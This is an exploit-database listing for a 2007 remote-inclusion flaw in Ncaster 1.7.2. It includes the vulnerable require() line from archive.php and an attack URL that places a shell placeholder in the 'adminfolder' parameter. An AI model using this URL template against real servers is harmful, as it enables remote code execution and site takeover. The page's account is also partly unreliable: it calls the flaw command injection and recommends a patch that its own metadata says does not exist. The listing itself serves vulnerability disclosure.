header-logo
Suggest Exploit
vendor:
Ncaster
by:
k1n9k0ng
7.5
CVSS
HIGH
Remote Code Execution (RCE)
78
CWE
Product Name: Ncaster
Affected Version From: Ncaster 1.7.2
Affected Version To: Ncaster 1.7.2
Patch Exists: NO
Related CWE:
CPE: a:ncaster:ncaster:1.7.2
Metasploit:
Other Scripts:
Platforms Tested:
2007

Ncaster 1.7.2 RCE Vulnerability

The Ncaster 1.7.2 script is vulnerable to remote code execution due to improper validation of the 'adminfolder' parameter in the 'archive.php' file. An attacker can exploit this vulnerability by injecting a shell command in the 'adminfolder' parameter, leading to arbitrary code execution.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the latest patch or update to a newer version of the Ncaster script. Additionally, ensure that input validation and sanitization techniques are implemented to prevent arbitrary code execution.
Source

Exploit-DB raw data:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts         : Ncaster 1.7.2
Discovered By   : k1n9k0ng
Scripts site    : http://ncastercms.com/downloads/ncaster172.zip
Thanks To       : #sekuritionline, #semprol, #mimid, #r.i.p, #x-code, #yogyafree
special To      : adhietslank, babypunk, bugs_, cyberlog, cah_gemblunkz
site            : www.sekuritionline.net
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

bug Script:
require("$adminfolder/sources/datelib.php");

bug found:
"http://www.site.net/ncaster/admin/addons/archive/archive.php?adminfolder=[shell]"

# milw0rm.com [2007-08-09]